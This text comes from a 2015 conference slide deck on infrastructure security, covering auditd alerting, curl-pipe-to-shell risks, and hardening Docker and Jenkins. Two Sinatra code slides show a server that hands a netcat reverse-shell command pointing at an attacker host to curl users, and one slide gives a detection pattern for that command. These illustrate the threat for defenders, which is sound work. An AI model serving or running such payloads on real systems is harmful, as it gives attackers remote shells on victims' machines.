WHO'S THIS CLOWN? 2 ▸ Infrastructure security at Etsy. ▸ Recovered operations monkey at Puppet Labs. ▸ Own a lot of black t-shirts. ▸ Had 1300 accounts on his high school Linux system. (: 2 https://twitter.com/skullmandible/status/411281851131523072 3 — @benjammingh for LasCon 2015
SETLIST ▸ Intros. (you are here). ▸ Frame the problem, why am I here. ▸ Things from the real world(™) & how to cope. ▸ Far far too many summaries. ▸ Wings, moonshine and dancing? (I have no idea) 4 — @benjammingh for LasCon 2015
FROM TINY SEEDS, DO MIGHTY ACORNS GROW. ▸ PinkiePwn's 6 tiny bugs in Chrome to full sandbox escape. ▸ Egor Homakov's 5 small bugs in Github to full private access on GitHub. ▸ XSS to remote code execution in under an hour. ▸ Username & password from HVAC system leads to 8 — @benjammingh for LasCon 2015
SECURITY PEOPLE AREN'T GREAT SECURE CODERS. ▸ Snort: 10 CVEs, Wireshark: 322! CVEs ▸ Security Firm Bit9 Hacked, Used to Spread Malware ▸ Joxean Koret on Breaking Antivurius software ▸ Tavis from Project Zero on exploiting ESET ▸ BEST! FireEye just running Apache/PHP as root ! 11 — @benjammingh for LasCon 2015
SO WHO DO I TRUST? ▸ No one? Always a great position for security people, who don't want to get paid. ▸ Everyone? Do I have some emails with funny cats for you to click on. ▸ Security vendors? If you have infinite money and no attackers. ▸ Attackers! 12 — @benjammingh for LasCon 2015
GO USE GITROB ▸ http://michenriksen.com/blog/gitrob-putting-the- open-source-in-osint/ ▸ https://github.com/michenriksen/gitrob 27 — @benjammingh for LasCon 2015
COPING WITH MULTILINE AUDITD ▸ ELK: multiline filter in Logstash. ▸ Other: github/gdestuynder/Audisp-json ▸ Have cash, want a decent GUI (and more): Go use Threatstack! ▸ Write something yourself in python & golang: I keep promising to OSS this ): 34 — @benjammingh for LasCon 2015
ALERT ON SKETCHY THINGS. (ASSUMES ELK) 1. Elastalert from Yelp 2. Alert on "/bin/nc *-e /bin/sh*" 3. You will now find when someone tries to run a reverse shell! 4. Or when yours ops people do fun things. 35 — @benjammingh for LasCon 2015
SINATRA EXAMPLE get '/install.sh' do if request.env['HTTP_USER_AGENT'] =~ /curl/ return 'nc -e /bin/sh root.legit.pw 2222 &' else return print_install_code() end end 39 — @benjammingh for LasCon 2015
SINATRA EXAMPLE 2: PAYBACK get '/install.sh' do ip = request.env['HTTP_CLIENT_IP'] if seen_before.include? ip return print_install_code() else seen_before << ip return 'nc -e /bin/sh root.legit.pw 2222 &' end end 40 — @benjammingh for LasCon 2015
VERIFIABLE This doesn't exist: foo$ curl legit.pw/sketch.sh | sudo sh --gpg-verify No one has ever done this: foo$ curl legit.pw/sketch.sh | gpg --verify --output - | sudo sh 46 — @benjammingh for LasCon 2015
CURL | BASH "But I trust HTTPS" ▸ HTTPS certs cost ~$6. ▸ If I can't make $6 by owning a system, I should probably stop being an attacker. ▸ @letsencrypt will soon make this free. 47 — @benjammingh for LasCon 2015
>30% OF IMAGES IN DOCKER HUB CONTAIN HIGH PRIORITY SECURITY VULNS - JAYANTH GUMMARAJU, TARUN DESIKAN AND YOSHIO TURNER FROM BANYANOPS 59 — @benjammingh for LasCon 2015
BUT IS DOCKER ITSELF SECURE? ▸ Don't run things as root. ▸ No really, stop running things as root. ▸ Did I mention not running things as root. ▸ It is also not 1999. (Docker 1.8 addresses some of this, with it's changes to who it runs as) 63 — @benjammingh for LasCon 2015
SECURIFY THE DOCKER. ▸ Don't use --privileged. ▸ Use --cap-drop all and --cap-drop to get the minimum capabilities. ▸ Use Docker Notary ▸ Use GRSecurity (just do that anyway, if you can.) ▸ Use SELinux... I may as well ask for a pony here. 64 — @benjammingh for LasCon 2015
▸ I am not saying Docker is ZOMG unhackable. ▸ it's just cgroups and namespacing. (just) ▸ Escapes will happen. ▸ They have a rad security team (Hi @diogomonica and @nathanmccauley) 70 — @benjammingh for LasCon 2015
UNPINCHOFSALTD ▸ You can use it in a way that is secure, enough. ▸ network separation & segregation still works. ▸ secrets/credentials still a bigger problem. ▸ PLEASE don't just adopt it because it's new & shiny. ▸ ! " unikernels ✨ $ 71 — @benjammingh for LasCon 2015
MAKE JENKINS SUCK FEWER * DISABLE EXECUTION ON THE MASTER JENKINS HOST. * DISABLE ANONYMOUS ACCESS. * (USE TRAVIS, IF YOU CAN) 78 — @benjammingh for LasCon 2015
JENKINS AS A FORCE FOR [SECURITY] GOOD ▸ Gauntlt "be mean to your code" ▸ https://github.com/secure-pipeline ▸ Even Adobe blog on secure software, zomg! 81 — @benjammingh for LasCon 2015
SUMMARY ▸ Computers are apparently hard. ▸ Security is clearly harder still, obv. ▸ Actually trust and humans is hard. ▸ The typing is the easy bit. (ish) 84 — @benjammingh for LasCon 2015
MORE SUMMARY ▸ Complex systems lead to much more complex security problems. (see Oauth) ▸ Annual pen-tests don't scale, bug bounties can help. ▸ Attackers are mining any public info you have (GitHub, S3, pastebin?) ▸ No really, go check all your S3 buckets... 85 — @benjammingh for LasCon 2015
WILL THERE BE A SUMMARY OF SUMMARIES? ▸ I beg you to stop trusting curl. ▸ Auditd is awful, but it can be fewer awful. ▸ Jenkins, you probably have to have one. ▸ but that can be okay, nay, even useful for security. 86 — @benjammingh for LasCon 2015
A SUMMARY APPEARED, WHAT HAPPENED NEXT WILL SHOCK YOU ▸ Docker and security can be used in the same sentence. ▸ Understand your threat model (Apple's guide) ▸ Don't be a FireEye, stop running things as root. 87 — @benjammingh for LasCon 2015